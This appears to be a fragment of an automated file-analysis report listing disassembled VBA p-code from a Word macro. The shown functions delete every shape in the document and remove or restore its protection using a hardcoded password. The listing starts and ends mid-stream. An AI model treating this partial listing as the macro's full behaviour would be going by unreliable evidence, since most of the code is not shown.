' Ld i
' EndForVariable
' NextVar
' Line #158:
' Line #159:
' EndFunc
' Line #160:
' Line #161:
' FuncDefn (Public Function RemovePicture())
' Line #162:
' Dim
' VarDefn i (As Integer)
' Line #163:
' Line #164:
' StartWithExpr
' Ld ActiveDocument
' With
' Line #165:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' MemLdWith InlineShapes
' MemLd Count
' For
' Line #166:
' Ld i
' ArgsMemLdWith InlineShapes 0x0001
' ArgsMemCall ConvertToShape 0x0000
' Line #167:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #168:
' Line #169:
' MemLdWith Shapes
' ArgsMemCall SelectAll 0x0000
' Line #170:
' Ld Selection
' ArgsMemCall Delete 0x0000
' Line #171:
' EndWith
' Line #172:
' EndFunc
' Line #173:
' FuncDefn (Public Function UnprotectReadOnly())
' Line #174:
' Ld ActiveDocument
' MemLd ProtectionType
' Ld wdNoProtection
' Ne
' IfBlock
' Line #175:
' LitStr 0x000A "ahihiihaha"
' ParamNamed Password
' Ld ActiveDocument
' ArgsMemCall Unprotect 0x0001
' Line #176:
' EndIfBlock
' Line #177:
' Line #178:
' EndFunc
' Line #179:
' FuncDefn (Public Function ProtectReadOnly())
' Line #180:
' Ld ActiveDocument
' MemLd ProtectionType
' Ld wdNoProtection
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.